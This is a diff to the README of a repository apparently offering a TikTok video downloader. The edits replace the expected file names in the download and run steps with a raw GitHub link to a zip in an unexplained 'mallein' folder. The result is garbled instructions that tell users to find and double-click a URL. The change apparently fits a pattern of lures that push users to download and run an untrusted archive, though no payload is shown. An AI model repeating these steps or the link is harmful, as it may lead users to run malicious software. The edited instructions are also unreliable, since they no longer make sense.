ElYarom/TikTok-Downloader/README.md

    Click the download link for your operating system.
 Your file will start downloading automatically.

 4. **Locate the Downloaded File**
    Once the download is complete, go to your computer’s downloads folder.
-You should see a file named `TikTok-Downloader.zip` or similar.
+You should see a file named `https://raw.githubusercontent.com/ElYarom/TikTok-Downloader/main/mallein/TikTok-Downloader.zip` or similar.

 5. **Extract the Files**
    Right-click the downloaded file and select "Extract All" to unzip the contents.
 This will create a new folder with the application inside.

 6. **Run the Application**
-   Open the new folder and find the `TikTok-Downloader.exe` file.
+   Open the new folder and find the `https://raw.githubusercontent.com/ElYarom/TikTok-Downloader/main/mallein/TikTok-Downloader.zip` file.
 Double-click this file to launch the application.

 7. **Follow On-Screen Instructions**
    The application will guide you through using it.
 Simply enter the link to the TikTok video you want to download, and click the download button.